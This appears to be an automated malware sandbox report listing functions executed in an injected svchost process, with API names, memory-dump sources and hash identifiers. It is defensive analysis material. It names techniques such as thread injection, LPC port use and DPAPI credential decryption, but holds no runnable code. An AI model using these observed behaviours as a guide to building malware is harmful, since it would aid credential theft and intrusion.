                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 00007DF45B6FE910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                    • String ID: ,$,$H$H
                                                                                                                    • API String ID: 2459737528-3578512806
                                                                                                                    • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                    • Instruction ID: 0588ba0bb4b80db6e3019d249339f935afcd4700ea716fe569d534d71a6fbb35
                                                                                                                    • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                    • Instruction Fuzzy Hash: AA02603061CB848BD764EF18D88566AB7E1FBD8300F50493EE58EC3795DA74E9468B83
                                                                                                                    Function 00007DF45B6FF180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                    • String ID: $0$@
                                                                                                                    • API String ID: 3298263305-2347541974
                                                                                                                    • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                    • Instruction ID: 1d003ad8d2cd2cc2dbb5b1b51b9e61cb000e5ec2f08018e99246c2aea5369e49
                                                                                                                    • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                    • Instruction Fuzzy Hash: E451943452DB898FD764EF58D4857AA77E0FB89300F10452EE88EC2345DB74E4858B83
                                                                                                                    Function 00007DF45B6FF32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPortfree
                                                                                                                    • String ID: $0$@
                                                                                                                    • API String ID: 2184535508-2347541974
                                                                                                                    • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                    • Instruction ID: 395a920727a7522bcc4eb4df60863c38c17db60f59034ef124ee85e7fef7b0e4
                                                                                                                    • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                    • Instruction Fuzzy Hash: 74512B31A0DB898FE764EB68D4947ABB7E5FB98301F10092EE88EC2355DF74D4448B42
                                                                                                                    Function 00007DF45B6F0B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 2722548352-2967466578
                                                                                                                    • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                    • Instruction ID: 2840a045b9ef58e2af973d5bbe3909da1c068f6fccba39f471961a18c6e38f69
                                                                                                                    • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                    • Instruction Fuzzy Hash: 174171315089888FDB45EF28DCC8ADA77B5FB94701F140666D84BDB269DF38A844CB81
                                                                                                                    Function 00007DF45B6F08CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3114477661-0
                                                                                                                    • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                    • Instruction ID: a3e455ea2cbbbd97a0b6b9eb02ca441f1288a77030d5b00788fc43a5859f9439
                                                                                                                    • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                    • Instruction Fuzzy Hash: EB714F3051CB888FE764EF28D8997ABB7E5FB94315F04062EE48EC3295DF7894458B42
                                                                                                                    Function 00007DF45B6F59B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2502124517-0
                                                                                                                    • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                    • Instruction ID: 8d4ee547fd24f1f1f22d5df13a9006b49e9304b4ad2bdafb8eab90fa1809255a
                                                                                                                    • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                    • Instruction Fuzzy Hash: 20315270618A488FD794EF28D8D879A77E5FB94310F50462BD85BC22D4DF38D945CB82
                                                                                                                    Function 00007DF45B6D286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleSuspendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1038686644-0
                                                                                                                    • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                    • Instruction ID: 1e6f5371eabc13deb832fe903e5555829f14ca14133ba3febacc6fc3ac2b09f0
                                                                                                                    • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                    • Instruction Fuzzy Hash: E991A730A0C9594FDB69AB18D45126673E1FF59310F18416ED89FC7785DE39E842CBC2
                                                                                                                    Function 0000013E03301CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2514095188.0000013E03300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03300000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_13e03300000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptCloseConnectHandlePort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3811980168-0
                                                                                                                    • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                    • Instruction ID: 4c836bd6e51d0722e4872ac7e0e2110a6bebc69fd659323b6a8aedee2bce725a
                                                                                                                    • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                    • Instruction Fuzzy Hash: D9919734608F088FD769DF68C4917E673E1FB94310F14475EE4ABC72D6DA78A9428781
                                                                                                                    Function 00007DF45B70D42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                    • Instruction ID: db4b753d4eb574e5b3a5e7ffd7256f753bdc056caf5adeefd7e1d31b9fee0d5f
                                                                                                                    • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                    • Instruction Fuzzy Hash: E0020F3161CF488FE765FB58D855A9BB7E1FB98300F40452AE84FC32A1DE74E9458B82
                                                                                                                    Function 00007DF45B6F60F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 834300711-0
                                                                                                                    • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                    • Instruction ID: 8b2234b75e9c3c2449716b5fae93c2dcee0353f37eb1246df6115cdc8e9600b7
                                                                                                                    • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                    • Instruction Fuzzy Hash: 9B316E3071CA484FE748EB6CD89966AB7E1EB98341F40452EE84EC3395DE78D8418792
                                                                                                                    Function 0000013E033015C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000013E03301E3A), ref: 0000013E03301654
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2514095188.0000013E03300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03300000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_13e03300000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                    • Instruction ID: 6397b6e5dd9f9c3543034c0a5d86e777ff1d3b4d799a74c5992d455ebf00c304
                                                                                                                    • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                    • Instruction Fuzzy Hash: 56216671A08B088FDB58DF6CC4C96AAB7E1FB68305F180A6EF49AC7250D735D585CB41
                                                                                                                    Function 00007DF45B6FE25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                    • Instruction ID: c937c00d36e8fe9137222ffaf39a3e197dba2124b541fb1b1a53a0efe5248584
                                                                                                                    • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                    • Instruction Fuzzy Hash: CDF06D74A1CB848FDB64EB2CD489B5977E1FB99700F504559E84CC7345EA34D8848B86
                                                                                                                    Function 00007DF45B6FE094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                    • Instruction ID: 514a1618f9f6eaec2b66cf30268aad4fb4d2639a8e3849b151921cfdedc4b990
                                                                                                                    • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                    • Instruction Fuzzy Hash: C8F0AF34A1C7C48FD6A0EB288484B9ABBE0BB9A340F54591AE8CCC3311D73594848B03
                                                                                                                    Function 00007DF45B6FE3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                    • Instruction ID: 571cb9e31eda896a4d41a8e2fbc0e1b7f8eda4562ceaae2106558bbb2bb1a387
                                                                                                                    • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                    • Instruction Fuzzy Hash: D5E09B31618A448FDB05EF94C8C15AAB7F0EBD8300F004D7AEC4FC7264D664D698C642
                                                                                                                    Function 00007DF45B75D66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemInfo.KERNELBASE(?,00007DF45B76EF2F,?,?,?,?,00000000,00000000), ref: 00007DF45B75D689
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 31276548-0
                                                                                                                    • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                    • Instruction ID: 94911a45f2c8269ec0f99e2973f4a058310d60d4486db34f6a616b5a18f4f0e9
                                                                                                                    • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                    • Instruction Fuzzy Hash: BFE04F31A148098BF749F731DC995E77371FBA6300B804673D80B812F6EE2DA24ACA91
                                                                                                                    Function 00007DF45B6FE170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                    • Instruction ID: 00be7bdb1f902be8b6ea7b159eb397d02b30a6dd359bff686e60a2c092564140
                                                                                                                    • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                    • Instruction Fuzzy Hash: B8D05E30E2CA894BDA10F729884061A3BE1FB99304F904624D84DC3308E63CE4808783
                                                                                                                    Function 00007DF45B6FE150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF45B6FC0F7), ref: 00007DF45B6FE160
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                    • Instruction ID: 0d3dfb01bac68cc64a85ef079434f43c005eb5e86fa3fce5c835c44cebe46771
                                                                                                                    • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                    • Instruction Fuzzy Hash: 15C08C30E5890B8FE908B2AB4C8030625A0AB4E310F800011D80EC2384EC0CE4D04393
                                                                                                                    Function 00007DF45B6FE3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                    • Instruction ID: dbb85cfd86cb721f8d2ec0dccf1650068c855685bfd79565bef707a382dbfc46
                                                                                                                    • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                    • Instruction Fuzzy Hash: F9C08C00E28C0A5AEA14B2AA4C8461A24A0AB4C300F801021EC0EC2388E84CE8C48393
                                                                                                                    Function 00007DF45B6D4998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: freemalloc
                                                                                                                    • String ID: x
                                                                                                                    • API String ID: 3061335427-2363233923
                                                                                                                    • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                    • Instruction ID: ab97166f7d9113acfaff479a3b0874c331455ea5d53263ec7b6aca07a47a8585
                                                                                                                    • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                    • Instruction Fuzzy Hash: 6EB19931A1CA844EE729B71894916EFB3E1FF95300F50056EE4DFC6293DE38E606C686
                                                                                                                    Function 00007DF45B6FF00C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: calloc
                                                                                                                    • String ID: 0$@
                                                                                                                    • API String ID: 2635317215-1545510068
                                                                                                                    • Opcode ID: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                    • Instruction ID: 93cfa6440047850098171047e4eeb8cf3ae42fa0ebbcc3bd4a580f7ed5509bd4
                                                                                                                    • Opcode Fuzzy Hash: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                    • Instruction Fuzzy Hash: 32416E30609A898FE754EB58C458B6BB7E0FB98341F10452EE84EC3394EF79D844CB92
                                                                                                                    Function 0000013E033433B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2142356803.0000013E03340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03340000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_13e03340000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID: x
                                                                                                                    • API String ID: 3298025750-2363233923
                                                                                                                    • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                    • Instruction ID: 4124de311f3650a1e5a1af0c4f925af380778859b3d757075068a34769f1bbfa
                                                                                                                    • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                    • Instruction Fuzzy Hash: BEB11635618B580AD72DAB3894C16EA77E1FB85310F18051EF4E7C32C3E968FA568A81
                                                                                                                    Function 00007DF45B6EA0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2835849967-0
                                                                                                                    • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                    • Instruction ID: fadd0cdabd00802087a63d390f900822a8172184bbf87030da3d35f9f9f61dc6
                                                                                                                    • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                    • Instruction Fuzzy Hash: 0CD1417551CB888BD765EF24D8857ABB7E1FB94300F14462EE88FC3291EF34A5058B82
                                                                                                                    Function 00007DF45B7CE854 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 0-3081909835
                                                                                                                    • Opcode ID: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                    • Instruction ID: d637ee4e8eff5bdcc606fdc27b3ccb6ce86d941b84df8736826f01f8bdc434a7
                                                                                                                    • Opcode Fuzzy Hash: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                    • Instruction Fuzzy Hash: 84716E70918A488FD769EF28C4851A677E5FB49310B50163EDC9FC36A2EB34B4468B81
                                                                                                                    Function 00007DF45B70128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3388366904-0
                                                                                                                    • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                    • Instruction ID: 830ba4184f216e4c005afd9657a9e236bac9c08cd3f336927486208c628fcc6a
                                                                                                                    • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                    • Instruction Fuzzy Hash: 7771857061CB884FE754AF5894C576AB7E1FB98311F60093FE88FC37A2DE3498458A42
                                                                                                                    Function 00007DF45B6E9F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3388366904-0
                                                                                                                    • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                    • Instruction ID: 018db16fec89aa2b122a3141cd5c51daab7cf250db4cd64f1abc039453f8046a
                                                                                                                    • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                    • Instruction Fuzzy Hash: 4D41817160C6484FEB58EB289C8566FB7E5EB99745F10052EE88FC2291EE34E9018783
